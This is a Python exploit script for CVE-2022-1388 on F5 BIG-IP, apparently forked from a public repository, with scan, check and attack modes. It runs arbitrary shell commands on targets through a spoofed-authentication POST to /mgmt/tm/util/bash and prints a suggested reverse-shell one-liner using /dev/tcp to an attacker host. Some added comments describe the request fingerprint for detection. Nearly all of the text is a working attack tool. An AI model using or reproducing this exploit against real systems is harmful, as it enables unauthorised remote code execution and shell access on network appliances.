forked from ZephrFish/F5-CVE-2022-1388-Exploit
CVE_2022_1388.py
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
# CVE 2022-1388 F5 Exploit
# Translated by: Google & ZephrFish
# Removed reverse shell option and merged into main function
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning: the requests.post() calls in this
# file pass verify=False, so TLS certificates are never validated.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Start-up time in epoch seconds; not referenced anywhere else in this listing.
t = int(time.time())
# Colour Functions
def prRed(skk):
    """Print ``skk`` in bright red (ANSI colour 91) and reset the colour afterwards."""
    coloured = "\033[91m {}\033[00m".format(skk)
    print(coloured)
def prGreen(skk):
    """Print ``skk`` in bright green (ANSI colour 92) and reset the colour afterwards."""
    coloured = "\033[92m {}\033[00m".format(skk)
    print(coloured)
def prYellow(skk):
    """Print ``skk`` in bright yellow (ANSI colour 93) and reset the colour afterwards."""
    coloured = "\033[93m {}\033[00m".format(skk)
    print(coloured)
def title():
    """Print the ASCII-art banner followed by the command-line usage summary."""
    # Banner text; the backslashes inside the literal are part of the drawing.
    print('''
_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ \| | | || ___| / __ \| _ |/ __ \/ __ \ / | |____ || _ || _ |
| / \/| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / \ V / \ V /
| | | | | || __||______| / / | /| | / / / / |______|| | \ \ / _ \ / _ \
| \__/\\ \_/ /| |___ ./ /___\ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
\____/ \___/ \____/ \_____/ \___/ \_____/\_____/ \___/\____/ \_____ \_____/
''')
    # One usage line per mode handled in main(): -v (check), -a (attack), -s (scan).
    # NOTE(review): the first usage line names CVE-2022-1388.py (hyphens) while
    # the other two use CVE_2022_1388.py (underscores).
    print('''
CVE-2022-1388 F5 Exploit
Usage:
Check Hosts: python3 CVE-2022-1388.py -v true -u target_url
Exploit Host: python3 CVE_2022_1388.py -a true -u target_url -c command
Exploit List: python3 CVE_2022_1388.py -s true -f file
''')
def headers():
    """Return a fresh dict of the HTTP headers sent with every request.

    For detection: a management-plane request that combines a ``Connection``
    header naming ``x-F5-Auth-Token``, a one-character ``X-F5-Auth-Token``
    value and Basic credentials for ``admin`` with an empty password is the
    request fingerprint this script produces.
    """
    return {
        # Host is fixed to loopback regardless of which target is contacted.
        "Host": "127.0.0.1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
        'Content-Type': 'application/json',
        # Lists the auth-token header as a connection-level (hop-by-hop) header.
        'Connection': 'keep-alive, x-F5-Auth-Token',
        # Placeholder value, not a real token.
        'X-F5-Auth-Token': 'a',
        # Base64 of "admin:" - user admin with an empty password.
        'Authorization': 'Basic YWRtaW46',
    }
def check(target_url):
    """Probe ``target_url`` and print whether it answers as vulnerable.

    The probe is not passive: it POSTs a request to ``/mgmt/tm/util/bash``
    asking the device to run ``id``, so a positive result means a command was
    executed on the target.  A host is reported vulnerable only when the reply
    is HTTP 200 and its body contains ``commandResult``; every other reply
    prints "Not Vulnerable".  That includes error replies from a filtered or
    proxied management endpoint, so a negative result on its own does not show
    that the device is patched.
    """
    endpoint = target_url + '/mgmt/tm/util/bash'
    payload = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        # verify=False: the TLS certificate of the target is not validated.
        reply = requests.post(url=endpoint, json=payload, headers=headers(), verify=False, timeout=5)
        confirmed = reply.status_code == 200 and 'commandResult' in reply.text
        if not confirmed:
            prRed("[-] Target {} Not Vulnerable".format(target_url))
        else:
            prGreen("[+] Target {} Vulnerable".format(target_url))
    except Exception:
        # Connection errors and timeouts end here; the cause is not reported.
        prYellow('url access exception {0}'.format(target_url))
def attack(target_url, cmd):
    """Send ``cmd`` to the target's bash utility endpoint and print its output.

    Builds the same POST as check() with a caller-supplied command in place of
    ``id``.  On an HTTP 200 reply whose body contains ``commandResult`` the
    parsed ``commandResult`` field is printed; any other reply prints
    "Not Vulnerable".  For defenders the observable is the same as for
    check(): a POST to ``/mgmt/tm/util/bash`` carrying the headers() set, with
    a JSON body of ``command: run`` and a ``utilCmdArgs`` value starting
    with ``-c``.
    """
    attack_url = target_url + '/mgmt/tm/util/bash'
    # cmd is placed between single quotes as-is; no escaping is applied.
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        # verify=False: the TLS certificate of the target is not validated.
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            # Parsed before anything is printed, so a body that is not valid
            # JSON (or lacks the key at top level) falls through to the except branch.
            default = json.loads(response.text)
            display = default['commandResult']
            prGreen("[+] Target {} Vulnerable".format(target_url))
            # Fixed hint text, printed on every successful run regardless of cmd.
            print("suggested command for a reverse shell!: bash -i >&/dev/tcp/ATTACKERHOST/attackerport 0>&1")
            print('[+] Response:{0}'.format(display))
        else:
            prRed("[-] Target {} Not Vulnerable".format(target_url))
    except Exception as e:
        # Any failure (connection, timeout, JSON parsing, missing key) ends
        # here; the exception detail in e is discarded.
        prYellow('url exception {0}'.format(target_url))
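def scan(file):
    """Run check() once for every non-blank line of the text file ``file``.

    Each line is stripped, passed through format_url() and then probed.  The
    file is opened in a ``with`` block so the handle is closed even if a probe
    raises; the original left it to the garbage collector.

    Args:
        file: path to a UTF-8 text file with one host or URL per line.
    """
    with open(file, 'r', encoding='utf-8') as handle:
        for raw_line in handle:
            candidate = raw_line.strip()
            if not candidate:
                continue
            url_path = format_url(candidate)
            # format_url() returns None when it rejects an entry; skip it
            # instead of letting check() fail on None + str.
            if url_path is None:
                continue
            check(url_path)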
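def format_url(url):
    """Normalise one host entry into a URL with an explicit scheme.

    Surrounding whitespace is removed first, then ``https://`` is prepended
    unless the entry already starts with ``http://`` or ``https://`` (compared
    case-insensitively).  The original tested only the first four characters
    before stripping, so an entry with leading whitespace, or a bare hostname
    that happens to begin with "http", was handled wrongly.

    Args:
        url: host name or URL as text.

    Returns:
        The normalised URL, or None (after printing a notice) when ``url`` is
        not a string.
    """
    try:
        cleaned = url.strip()
        if not cleaned.lower().startswith(("http://", "https://")):
            cleaned = "https://" + cleaned
    except (AttributeError, TypeError):
        # Non-string input (None, bytes, numbers): report it and return None.
        prYellow('URL Incorrect {0}'.format(url))
        return None
    return cleaned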
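def _as_flag(text):
    """Convert a command-line flag value to bool, treating explicit negatives as False."""
    return text.strip().lower() not in {"", "0", "false", "no", "n", "off"}


def main():
    """Parse the command line and dispatch to check(), attack() or scan().

    Modes are tried in a fixed order and the first match wins:
    ``-v`` with ``-u`` runs check(); ``-a`` with ``-u`` runs attack() using
    ``-c`` (default ``id``); ``-s`` with ``-f`` runs scan().  With no
    matching combination the process exits with status 0 and no message.

    The flag options previously used ``type=bool``, which turns every
    non-empty string into True, so ``-a false`` still selected attack mode.
    They now go through _as_flag(), which reads ``false``, ``0``, ``no``,
    ``n``, ``off`` and the empty string as False and anything else as True.
    """
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=_as_flag, help=' check target is vulnerable ')
    parser.add_argument('-u', '--url', type=str, help=' TargetURL ')
    parser.add_argument('-a', '--attack', type=_as_flag, help=' attack mode ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' command to execute on remote host ')
    parser.add_argument('-s', '--scan', type=_as_flag, help=' Batch Identification, supply a file with target hosts ')
    parser.add_argument('-f', '--file', type=str, help=' path to file containing target hosts')
    args = parser.parse_args()

    # An omitted flag parses to None, so each mode needs an explicit True.
    if args.verify is True and args.url is not None:
        check(args.url)
    elif args.attack is True and args.url is not None and args.command is not None:
        attack(args.url, args.command)
    elif args.scan is True and args.file is not None:
        scan(args.file)
    else:
        sys.exit(0)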
# Script entry point: print the banner and usage text, then parse the command
# line and run the selected mode.
if __name__ == '__main__':
    title()
    main()